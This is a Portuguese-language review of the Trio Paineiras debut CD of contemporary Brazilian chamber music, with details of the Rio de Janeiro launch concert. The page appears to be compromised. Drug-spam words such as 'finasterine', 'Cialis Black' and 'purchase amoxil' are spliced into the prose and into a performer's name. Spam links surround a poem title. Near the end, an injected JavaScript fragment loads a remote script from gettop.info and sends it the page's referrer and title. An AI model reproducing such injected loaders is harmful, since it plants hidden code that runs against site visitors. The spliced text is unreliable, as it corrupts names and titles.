CD/DVDCríticaLateralMúsica contemporâneaMúsica de câmaraProgramaçãoRio de Janeiro

Talento desabrochado

Trio Paineiras lança seu primeiro CD com obras e iniciativa de compositores brasileiros contemporâneos.

 

No universo da música de concerto, sobretudo da música contemporânea, dedicados compositores e intérpretes buscam, a cada dia, novos projetos para divulgar o seu trabalho e fomentar a crescente produção artística atual. Assim nasceu o Trio Paineiras. Formado por Marina Spoladore (piano), Batista Junior Purchase (clarinete/clarone) e Marco Catto (violino/viola), que lança, no dia 25 de julho, terça-feira, às 19h, seu CD de estreia, Trio Paineiras interpreta Compositores de Hoje (A Casa Discos), no Espaço Guiomar Novaes da Sala Cecília Meireles, no Rio de Janeiro.

O álbum reúne novas obras para formação mista (violino/viola, clarinete/clarone e piano), de autoria de Rami Levin, finasterine Pauxy Gentil Nunes, Liduino Pitombeira, Marcos Lucas e Sergio Roberto de Oliveira, recentemente falecido, que assinou a produção.

 

Capa Trio Paineiras

Sobre o CD

Três jovens antenados com a música de seu tempo – mas não funk, hip hop, sertanejo ou MPB. A pianista Marina Spoladore, o clarinetista Batista Jr. e o violinista Marco Catto estão atentos à nova onda da música de concerto, especialmente a brasileira. Esses músicos, que integram o Trio Paineiras, emprestaram seu talento para que compositores contemporâneos encontrem espaço para divulgar seus trabalhos.

Este primeiro CD do Trio abre com Asas, da norte-americana Rami Levin. A obra, em dois movimentos, tem como inspiração o canto de dois pássaros comuns no Brasil: o bem-te-vi e o sabiá. O primeiro movimento, gracioso, tem trama bem costurada; o segundo, composto para os intérpretes, apresenta vários pássaros ao mesmo tempo com o canto do sabiá como melodia dominante, e é executado com lirismo e mesmo bem dosado arroubo romântico.

O profícuo compositor Sergio Roberto de Oliveira escreveu, para o Trio e para este CD a obra Paineira (Barriguda), que explora a árvore sob três perspectivas: a origem e a juventude, na qual tem espinhos; as painas leves e delicadas; e a maturidade da árvore, quando perde seus espinhos e passa a hospedar passarinhos e seus ninhos. No primeiro movimento, o piano evoca os ritmos africanos e o clarone, com graça, remete a uma “fala de preto-velho”, nas palavras do autor. O segundo movimento, de suavidade quase impressionista, descreve o flutuar de uma paina. O terceiro movimento tem o vigor e a agitação de um passaredo em polvorosa.

O carioca Marcos Lucas inspirou-se no pintor inglês William Turner (1775-1851) para pintar sua composição Três Telas de W. M. Turner com cores intensas e imagens dramáticas como os céus do pintor. Os intérpretes, aplicados, exploram, nos três movimentos, as possibilidades, texturas e densidades de seus instrumentos, criando atmosferas sombrias, nebulosas, nostálgicas, melancólicas ou sinuosas.

Também composta para o Trio, a obra Paineiras, de Liduino Pitombeira, tem seus três movimentos com títulos extraídos do poema http://cim-group.net/buy-avana/ A Paineira e o Poente http://astriria-akuntan.mhs.narotama.ac.id/2018/02/02/flexisyn-sale/ , de J. G. de Araújo Jorge, publicado em 1935. Lembrança em Turbilhão é o primeiro movimento, cheio de tensão em cromatismo e os gestos bruscos. O segundo movimento, Saudade ao Redor, é lento e meditativo, despertando leve melancolia. O terceiro movimento é Dispersos, e nele há certo agito como se um vento subitamente agitasse a superfície de um lago escuro.

A peça que fecha o CD é Tríptico, de Pauxy Gentil Nunes. Também em três movimentos, é apresentada como um experimento sobre a relação entre forma e conteúdo, em três peças quase gêmeas. As alterações rítmicas e os efeitos nos instrumentos (volatas, glissandi) demandam técnica dos intérpretes e criam atmosferas diversas.

Como flor que desabrocha com exuberância – vide a linda foto da capa do álbum –, este primeiro CD do Trio Paineiras mostra, além do talento dos jovens músicos, seu respeito e admiração pelos compositores brasileiros contemporâneos que, como todos nós, também querem mostrar sua viçosa florada.

 

Fotos: Cynthia C. Santos

 

SERVIÇO:

 

Concerto de lançamento do CD “Trio Paineiras interpreta Compositores de Hoje”

Trio Paineiras

 

Cialis Black 25 de julho, terça-feira, às 19h

Sala Cecília Meireles – Espaço Guiomar Novaes (R. da Lapa, 47, Lapa – Rio de Janeiro. Tel.: 21 2332-9223)

 

Entrada gratuita

 d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; purchase amoxil

Fabiano Gonçalves
Publicitário e roteirista (formado no Maurits Binger Film Institute - Amsterdã). Corroteirista do longa O Amor Está no Ar e de programas de TV (novela Chiquititas - 1998/2000). Redator na revista SuiGeneris, no site Escola24horas e no Departamento Nacional do Senac. Um dos fundadores do movimento.com, escreve também sobre televisão para o site teledossie.com.br. - E-mail: fabiano@movimento.com